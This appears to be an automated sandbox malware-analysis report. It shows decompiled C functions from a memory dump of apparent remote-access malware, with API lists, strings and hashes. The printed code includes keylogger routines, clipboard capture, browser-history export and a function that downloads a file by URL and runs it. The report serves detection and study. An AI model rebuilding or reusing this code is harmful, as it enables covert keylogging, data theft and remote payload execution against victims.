					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					E007893AC(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
					E0078480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0);
					E0078480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return E0076FD1B(_v8 ^ _t102);
			}

0x00787044
0x0078704f
0x00787056
0x0078705b
0x0078705b
0x00787078
0x00787170
0x00787176
0x00787178
0x00787179
0x00787179
0x0078717b
0x00787181
0x00787181
0x00787183
0x00787185
0x0078718e
0x00787191
0x0078719d
0x007871a4
0x007871b4
0x007871a6
0x007871a6
0x007871a9
0x007871a9
0x007871a9
0x007871ad
0x007871ad
0x00000000
0x007871ad
0x00787193
0x00787193
0x00787198
0x00787198
0x007871b0
0x007871b0
0x007871b0
0x007871b6
0x007871bc
0x007871c2
0x007871c3
0x007871c3
0x0078707e
0x0078707e
0x00787080
0x00787080
0x00787087
0x00787088
0x0078708c
0x00787092
0x00787098
0x007870c0
0x007870c0
0x007870c2
0x00000000
0x00000000
0x007870a1
0x007870a5
0x007870b7
0x007870b7
0x007870b9
0x00000000
0x00000000
0x007870aa
0x007870ac
0x007870ae
0x007870b6
0x007870b6
0x00000000
0x007870b6
0x00000000
0x007870ac
0x007870bb
0x007870bb
0x007870be
0x007870be
0x007870da
0x007870fb
0x00787123
0x0078712b
0x0078712d
0x0078712d
0x00787137
0x00787147
0x00787149
0x00787160
0x0078714b
0x0078714b
0x0078714b
0x0078714b
0x00787150
0x00000000
0x00787150
0x00787139
0x00787139
0x0078713e
0x00787157
0x00787157
0x00787157
0x00787167
0x00787168
0x0078716c
0x007871d7

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00787069

Strings

, xrefs: 007870AE
vux, xrefs: 0078705B

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Info
String ID: $vux
API String ID: 1807457897-1952022575
Opcode ID: 543a03f2215a2049a8d89450bfba67409789aeec4121e6fc34771d9b920a5983
Instruction ID: cb64fe35477329346437e3ad92b3939696feee2635d29c17639da620424a91ec
Opcode Fuzzy Hash: 543a03f2215a2049a8d89450bfba67409789aeec4121e6fc34771d9b920a5983
Instruction Fuzzy Hash: DD41197094824C9EDF299E64CC88BF6BBA9DB45304F3404EDE59B87142D239DA45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0074414D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93
sleepCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0074414D(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				WCHAR* _t40;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E007420D5(__ebx,  &_v52);
				E0075800F( &_v28, 0x30, E00741F95(E00757093( &_v76)));
				E00741FC7();
				E00741F95(0x7ac1a0);
				E0075432B(E00741EEB(E007430A6(_t48,  &_v100, E00744429(_t48,  &_v124, E00744405(_t48,  &_v148,  &_v692, 0, E0074427F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
				E00741EF0();
				E00741EF0();
				E00741EF0();
				E00741EF0();
				_t84 = 0;
				while(1) {
					_t40 = E00741EEB( &_v28);
					_t80 =  &_v52;
					if(E007579DC(_t40,  &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					E00741EF0();
					E00741FC7();
					return _t81;
				}
				E007420EC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				E00744AA4(_t48, 0x7ac138, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}

0x0074414d
0x00744164
0x00744167
0x00744170
0x0074418a
0x00744193
0x0074419d
0x007441f1
0x007441f9
0x00744201
0x0074420c
0x00744217
0x0074421c
0x0074421e
0x00744221
0x00744226
0x00744232
0x00000000
0x00000000
0x00744239
0x0074423f
0x00744243
0x00000000
0x00000000
0x00744245
0x00744267
0x0074426a
0x00744272
0x0074427e
0x0074427e
0x00744250
0x00744255
0x0074425f
0x00744266
0x00744266
0x00000000

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00744167

Part of subcall function 00757093: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0074417D), ref: 007570BA

Part of subcall function 0075432B: CloseHandle.KERNEL32(007441F6,?,007441F6,0079F464), ref: 00754341
Part of subcall function 0075432B: CloseHandle.KERNEL32(0079F464,?,007441F6,0079F464), ref: 0075434A

Part of subcall function 007579DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00744230,0079F464), ref: 007579F9

Sleep.KERNEL32(000000FA,0079F464), ref: 00744239

Strings

/sort "Visit Time" /stext ", xrefs: 007441B3

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: c08a53a908675abbbe5e3e118eaf360d6d1493bf0328c55017da4afbb0fb8d78
Instruction ID: 9ce3ed5a7e07eaeb7fb4f4c15c6caf38ca6559a777be976d32b5725ac7896f55
Opcode Fuzzy Hash: c08a53a908675abbbe5e3e118eaf360d6d1493bf0328c55017da4afbb0fb8d78
Instruction Fuzzy Hash: 68318431A10118EBCB18F7B4DC5EAEE7776AF91301F800169F906A71D2EF78598AC691

Uniqueness

Uniqueness Score: -1.00%

Function 00749C15, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00749C15(void* __ecx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				void* __ebx;
				void* __esi;
				void* _t23;
				void* _t27;
				void* _t30;
				void* _t78;
				void* _t84;
				void* _t85;

				_t85 = _t84 - 0x94;
				_t78 = __ecx;
				if( *0x7add24 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0076F114(0x7add24);
					_t88 =  *0x7add24 - 0xffffffff;
					if( *0x7add24 == 0xffffffff) {
						E00741F6D(0x7add28, 0x7add28);
						E0076F49E(_t88, E007927E5);
						E0076F0D5(0x7add24, 0x7add24);
					}
				}
				E00749BD9( &_v28);
				_t23 = E00749EAC(0x7add28);
				_t89 = _t23;
				if(_t23 == 0) {
					E00749DD2(0x7add28,  &_v28);
					_t27 = E007474E4(_t89);
					_t90 = _t27;
					if(_t27 != 0) {
						E00742084(0x7add28,  &_v76, "\r\n[End of clipboard]\r\n");
						E00742084(0x7add28,  &_v52, "\r\n[Text copied to clipboard]\r\n");
						_t30 = E007572DA( &_v148,  &_v76);
						E00743030(_t85 - 0x18, E00744429(0x7add28,  &_v100, E007572DA( &_v124,  &_v52), _t90, 0x7add28), _t30);
						E00748B80(_t78);
						E00741EF0();
						E00741EF0();
						E00741EF0();
						E00741FC7();
						E00741FC7();
					}
				}
				return E00741EF0();
			}

0x00749c1e
0x00749c33
0x00749c3b
0x00749c43
0x00749c48
0x00749c50
0x00749c54
0x00749c5e
0x00749c64
0x00749c6a
0x00749c50
0x00749c6f
0x00749c79
0x00749c7e
0x00749c80
0x00749c8c
0x00749c99
0x00749c9e
0x00749ca0
0x00749cae
0x00749cbb
0x00749cc9
0x00749cef
0x00749cf7
0x00749cff
0x00749d07
0x00749d12
0x00749d1a
0x00749d22
0x00749d22
0x00749ca0
0x00749d35

APIs

Part of subcall function 0076F49E: __onexit.LIBCMT ref: 0076F4A4

__Init_thread_footer.LIBCMT ref: 00749C64

Strings

[End of clipboard], xrefs: 00749CA6
[Text copied to clipboard], xrefs: 00749CB3

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Init_thread_footer__onexit
String ID: [End of clipboard]$[Text copied to clipboard]
API String ID: 1881088180-3686566968
Opcode ID: b4981919addf1a54a68fd77be1a13f94eb16c00c86f58bda83f280c1d5aac73c
Instruction ID: c52fb38429587d6906f867f543c1871377cd8e8000cb1b702b3a9cf7b6f50ddb
Opcode Fuzzy Hash: b4981919addf1a54a68fd77be1a13f94eb16c00c86f58bda83f280c1d5aac73c
Instruction Fuzzy Hash: 61218131A00118DACB18FBA4E89A9EEB379EF55310F800179FA0657593EF3C6D4BC650

Uniqueness

Uniqueness Score: -1.00%

Function 00789DB7, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00789DB7(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E007823BA(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x799fa8;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x799fb0;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E0077673F(_t23, _t23);
									goto L25;
								}
								if(E007823BA(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}

0x00789dbc
0x00789dbd
0x00789dc0
0x00789dc4
0x00789e6a
0x00789e7e
0x00789e83
0x00789e85
0x00789e8b
0x00789e8e
0x00789e90
0x00789e92
0x00789e92
0x00789e98
0x00789e9d
0x00789e9d
0x00789e87
0x00789e87
0x00000000
0x00789e87
0x00789dca
0x00789dcf
0x00000000
0x00000000
0x00789dd5
0x00789dda
0x00789ddc
0x00789ddc
0x00789de2
0x00000000
0x00000000
0x00789de7
0x00789dfe
0x00789dfe
0x00789e07
0x00789e09
0x00000000
0x00000000
0x00789e0b
0x00789e10
0x00789e12
0x00789e12
0x00789e18
0x00000000
0x00000000
0x00789e1d
0x00789e3b
0x00789e3b
0x00789e3d
0x00789e62
0x00000000
0x00789e67
0x00789e5a
0x00000000
0x00000000
0x00789e5c
0x00000000
0x00789e5c
0x00789e1f
0x00789e27
0x00000000
0x00000000
0x00789e29
0x00789e2c
0x00789e32
0x00000000
0x00000000
0x00000000
0x00789e34
0x00789e36
0x00789e38
0x00789e38
0x00000000
0x00789e38
0x00789de9
0x00789df1
0x00000000
0x00000000
0x00789df3
0x00789df6
0x00789dfc
0x00000000
0x00000000
0x00000000
0x00789dfc
0x00789e02
0x00789e04
0x00789e04
0x00000000

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0078A012,?,00000050,?,?,?,?,?), ref: 00789E92

Strings

OCP, xrefs: 00789E0B
ACP, xrefs: 00789DD5

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 2b13f8d16163febee5bcd893e0e0c64a2b899469d4a669ddd9a73942caf6484d
Instruction ID: dc007e419f3ca9a9d01004f616dd88af5690240e263987f1d1f0ac383ccd4c98
Opcode Fuzzy Hash: 2b13f8d16163febee5bcd893e0e0c64a2b899469d4a669ddd9a73942caf6484d
Instruction Fuzzy Hash: 40218663A80104A6DB34EE65C941BB7B69AABA4F51F5E4424EB09D7204E73ADD41C390

Uniqueness

Uniqueness Score: -1.00%

Function 00744A08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
networkCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00744A08(void* __edx, char _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t12;
				signed int _t15;
				void* _t16;
				void* _t22;
				void* _t23;
				signed int _t25;
				void* _t31;
				char* _t32;
				void* _t33;

				_t22 = _t23;
				_t32 =  &_a4;
				_t2 = _t22 + 8; // 0x7adba0
				_t12 = _t2;
				_t31 = _t12;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10);
				if(_t12 != 0) {
					L5:
					return 0;
				}
				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
					L9:
					return 1;
				}
				_t15 = E0075C71E(_t22, _t23);
				 *(_t22 + 0x44) = _t15;
				if(_t15 == 0) {
					goto L5;
				}
				_t30 =  *((intOrPtr*)(_t22 + 4));
				_t16 = E0075C76C(_t15,  *((intOrPtr*)(_t22 + 4)));
				_t25 =  *(_t22 + 0x44);
				if(_t16 == 1) {
					if(E0075D1ED() == 1) {
						goto L9;
					}
					_t34 = _t33 - 0x18;
					E00742084(_t22, _t33 - 0x18, "TLS Authentication failed");
					E00742084(_t22, _t34 - 0x18, "[ERROR]");
					_t16 = E0075C8E7(E00756C80(_t22, _t31),  *(_t22 + 0x44));
					_t25 =  *(_t22 + 0x44);
				}
				E0075C763(_t16, _t22, _t25, _t30, _t31, _t32);
				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
				goto L5;
			}

0x00744a0f
0x00744a11
0x00744a16
0x00744a16
0x00744a19
0x00744a1f
0x00744a20
0x00744a21
0x00744a22
0x00744a23
0x00744a2b
0x00744a59
0x00000000
0x00744a59
0x00744a30
0x00744aa0
0x00000000
0x00744aa0
0x00744a32
0x00744a37
0x00744a3c
0x00000000
0x00000000
0x00744a3e
0x00744a43
0x00744a48
0x00744a4e
0x00744a6b
0x00000000
0x00000000
0x00744a6d
0x00744a77
0x00744a86
0x00744a96
0x00744a9b
0x00744a9b
0x00744a50
0x00744a55
0x00000000

APIs

connect.WS2_32(?,007ADBA0,00000010), ref: 00744A23

Strings

[ERROR], xrefs: 00744A81
TLS Authentication failed, xrefs: 00744A72

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: connect
String ID: TLS Authentication failed$[ERROR]
API String ID: 1959786783-1964023390
Opcode ID: a64c0a8e08398c3f8e54caa36e5b8918451c4d6b82b62b9e58e85cf64dd5314f
Instruction ID: 5cab2ae66813a3e5bbaae04889ede54a90dc0af5c6a191ffd5fe60ded56689c4
Opcode Fuzzy Hash: a64c0a8e08398c3f8e54caa36e5b8918451c4d6b82b62b9e58e85cf64dd5314f
Instruction Fuzzy Hash: 23012631340200DBDF19BFA4998ABBA3B59DF41351B48805AFD058F247EFAADC04D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00752A86, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
sleepfilenetworkCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00752A86(void* __ebx, void* __edx, void* __ebp, char _a8, char _a12, char _a16, char _a28, void* _a108, void* _a132) {
				char _v4;
				intOrPtr* _t12;
				void* _t14;
				void* _t18;
				void* _t27;
				void* _t44;
				void* _t51;
				void* _t55;

				L0:
				_t44 = __edx;
				_t27 = __ebx;
				Sleep(0x64);
				_t55 =  *0x7abd6c - _t27; // 0x0
				if(_t55 != 0) {
					goto L0;
				}
				_t12 = E00741F95(E00741E49( &_a16, _t44, _t55, 0));
				_t14 = E00741F95(E00741E49( &_a12, _t44, _t55, 1));
				_t45 =  *_t12;
				E0075805B( &_a28,  *_t12, _t14);
				_t18 = E00741F95(E00741E49( &_a8,  *_t12, _t55, 2));
				__imp__URLDownloadToFileW(0, _t18, E00741EEB( &_a28), 0, 0);
				_t56 = _t18;
				if(_t18 == 0) {
					E00747350(0, _t51 - 0x18, _t45, _t56,  &_a16);
					E0074B0E2();
				}
				E00741EF0();
				_t8 =  &_v4; // 0x744538
				E00741E74(_t8, _t45);
				E00741FC7();
				E00741FC7();
				return 0;
			}

0x00752a86
0x00752a86
0x00752a86
0x00752a88
0x00752a8e
0x00752a94
0x00000000
0x00000000
0x00752aa4
0x00752ab8
0x00752abd
0x00752ac4
0x00752ae3
0x00752aea
0x00752af0
0x00752af2
0x00752b02
0x00752b07
0x00752b0c
0x0075318d
0x007533c4
0x007533c8
0x007533d4
0x007533e0
0x007533ed

APIs

Sleep.KERNEL32(00000064), ref: 00752A88
URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 00752AEA

Strings

8Et, xrefs: 007533C4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DownloadFileSleep
String ID: 8Et
API String ID: 1931167962-257909599
Opcode ID: 0dcfbfaa70a0850b8b419783966203b8537dc991a1fffd920b3b3c5ffde45ee8
Instruction ID: 0aac57cd42921f254ed1fc7df434769947ad75d04a28cd22add04469feaeabf9
Opcode Fuzzy Hash: 0dcfbfaa70a0850b8b419783966203b8537dc991a1fffd920b3b3c5ffde45ee8
Instruction Fuzzy Hash: AE119471508300DBD714FBB1D85A9BEB3A8AF55301F804D2EF94696092FF7C9A4DC652

Uniqueness

Uniqueness Score: -1.00%

Function 007495A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E007495A9(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t27;
				void* _t28;

				_t17 = __ebx;
				_t27 = __ecx;
				if( *((char*)(__ecx + 0x49)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t33 =  *0x7aa9d4 - 0x32;
				_t26 = "Offline Keylogger Stopped";
				if( *0x7aa9d4 != 0x32) {
					E00742084(__ebx,  &_v28, "Offline Keylogger Stopped");
					_t28 = _t28 - 0x18;
					E007572DA(_t28,  &_v28);
					E00749634(__ebx, _t27, _t33);
					E00741FC7();
				}
				_t29 = _t28 - 0x18;
				E00742084(_t17, _t28 - 0x18, _t26);
				E00742084(_t17, _t29 - 0x18, "[Info]");
				E00756C80(_t17, _t26);
				_t27[0x12] = 0;
				if(_t27[0x12] == 0 &&  *_t27 != 0) {
					UnhookWindowsHookEx( *_t27);
					 *_t27 =  *_t27 & 0x00000000;
				}
				return 1;
			}

0x007495a9
0x007495b0
0x007495b7
0x0074962c
0x00000000
0x0074962c
0x007495b9
0x007495c0
0x007495c5
0x007495cb
0x007495d0
0x007495d8
0x007495df
0x007495e7
0x007495e7
0x007495ec
0x007495f2
0x00749601
0x00749606
0x0074960e
0x00749616
0x0074961f
0x00749625
0x00749625
0x00000000

APIs

UnhookWindowsHookEx.USER32(?), ref: 0074961F

Part of subcall function 00749634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
Part of subcall function 00749634: wsprintfW.USER32 ref: 007496C3
Part of subcall function 00749634: SetEvent.KERNEL32(00000000,00000000), ref: 007496ED

Strings

[Info], xrefs: 007495FC
Offline Keylogger Stopped, xrefs: 007495C0, 007495C7, 007495F1

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EventHookLocalTimeUnhookWindowswsprintf
String ID: Offline Keylogger Stopped$[Info]
API String ID: 2949427887-1791908007
Opcode ID: d6ab04963d273036d58e03d4589d23c01d5c3d0ae06afb8d7f8657443ae11659
Instruction ID: 4fc27d8a50774a0f14c8964911817b68e6ce67dad5d1df59acd7f17e59854eb4
Opcode Fuzzy Hash: d6ab04963d273036d58e03d4589d23c01d5c3d0ae06afb8d7f8657443ae11659
Instruction Fuzzy Hash: 4A01B121A0420097DB257768D80F7FF7BE59B42301F84055DEA8512193EFBD195AC7D7

Uniqueness

Uniqueness Score: -1.00%

Function 007825B3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E007825B3(void* __ecx, void* __esi, void* __eflags, char _a4) {
				signed int _v8;
				signed int _t5;
				intOrPtr* _t18;
				signed int _t20;

				_t13 = __ecx;
				_push(__ecx);
				_t5 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t5 ^ _t20;
				_push(__esi);
				_t18 = E00781F97(0x15, "IsValidLocaleName", 0x7990e0, "IsValidLocaleName");
				if(_t18 == 0) {
					_t3 =  &_a4; // 0x77e33f
					IsValidLocale(E00782708(_t13, _t18, __eflags,  *_t3, 0), 1);
				} else {
					_t2 =  &_a4; // 0x77e33f
					 *0x793474( *_t2);
					 *_t18();
				}
				return E0076FD1B(_v8 ^ _t20);
			}

0x007825b3
0x007825b8
0x007825b9
0x007825c0
0x007825c3
0x007825da
0x007825e1
0x007825f6
0x007825ff
0x007825e3
0x007825e3
0x007825e8
0x007825ee
0x007825ee
0x00782613

APIs

IsValidLocale.KERNEL32(00000000,?w,00000000,00000001,?,?,0077E33F,?,?,0077DD1F,?,00000004), ref: 007825FF

Strings

IsValidLocaleName, xrefs: 007825C4, 007825CE
?w, xrefs: 007825F6, 007825E3

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocaleValid
String ID: ?w$IsValidLocaleName
API String ID: 1901932003-75978879
Opcode ID: 4071c5ad343d4d37357e43ad22eda7c20a3957156d6d0849498b15a1b3b1046a
Instruction ID: 319732f3fe26fbde31f422171778819446143ba6d3f137f87ac1550752fcb485
Opcode Fuzzy Hash: 4071c5ad343d4d37357e43ad22eda7c20a3957156d6d0849498b15a1b3b1046a
Instruction Fuzzy Hash: D9F059307C060CB7DB117B68AC07FAE7B54DB04712F00802AFE0166291DA7D1E029688

Uniqueness

Uniqueness Score: -1.00%

Function 00749B11, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E00749B11(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				void* _t10;
				signed int _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t10 = __ebx;
				_t17 = __ecx;
				_t12 = GetKeyState(0x11) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t17 + 0x4c)) - 0xa4;
				if(_t4 == 0) {
					_t13 = _t18 - 0x18;
					_push("[AltL]");
					L6:
					E00742084(_t10, _t13);
					return E00748B59(_t17);
				}
				_t7 = _t4 - 1;
				if(_t7 == 0) {
					if(_t12 == 0) {
						_t13 = _t18 - 0x18;
						_push("[AltR]");
						goto L6;
					}
					return _t7;
				} else {
					E007489BA(_t17, _t18 - 0x18);
					return E00748B80(_t17);
				}
			}

0x00749b11
0x00749b14
0x00749b1c
0x00749b22
0x00749b27
0x00749b56
0x00749b58
0x00749b5d
0x00749b5d
0x00000000
0x00749b64
0x00749b29
0x00749b2c
0x00749b45
0x00749b4a
0x00749b4c
0x00000000
0x00749b4c
0x00749b6a
0x00749b2e
0x00749b34
0x00749b41
0x00749b41

APIs

GetKeyState.USER32(00000011), ref: 00749B16

Part of subcall function 007489BA: GetForegroundWindow.USER32(00000000,?,00000000), ref: 007489EE
Part of subcall function 007489BA: GetWindowThreadProcessId.USER32(00000000,?), ref: 007489F9
Part of subcall function 007489BA: GetKeyboardLayout.USER32 ref: 00748A00
Part of subcall function 007489BA: GetKeyState.USER32(00000010), ref: 00748A0A
Part of subcall function 007489BA: GetKeyboardState.USER32(?), ref: 00748A17
Part of subcall function 007489BA: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00748A33

Part of subcall function 00748B80: SetEvent.KERNEL32(?,?,?,?,00749CFC,?,?,?,?,?,00000000), ref: 00748BAD

Strings

[AltL], xrefs: 00749B58
[AltR], xrefs: 00749B4C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
String ID: [AltL]$[AltR]
API String ID: 3195419117-2658077756
Opcode ID: 8b113cce0d4b2f176c91a0615d1f492ff9a39933b70228e63569f537435216a7
Instruction ID: 9fe7ee07d5909c65556bf695de8a34ab807b431d773f9fd3e52cd5daca6ccc32
Opcode Fuzzy Hash: 8b113cce0d4b2f176c91a0615d1f492ff9a39933b70228e63569f537435216a7
Instruction Fuzzy Hash: DDE065E1340615AA8958363D792F57E3811CB427707810249F6468B686DF5E4D4183D7

Uniqueness

Uniqueness Score: -1.00%

Function 00752777, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00752777(void* __edx, void* __ebp, void* __eflags, char _a16, void* _a128, void* _a152) {

				_t19 = __edx;
				ShellExecuteW(0, L"open", E00741F95(E00741E49( &_a16, __edx, __eflags, 0)), 0, 0, 1);
				_t2 =  &_a16; // 0x744538
				E00741E74(_t2, _t19);
				E00741FC7();
				E00741FC7();
				return 0;
			}

0x00752777
0x00752795
0x007533c4
0x007533c8
0x007533d4
0x007533e0
0x007533ed

APIs

ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00752795

Strings

open, xrefs: 0075278F
8Et, xrefs: 007533C4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

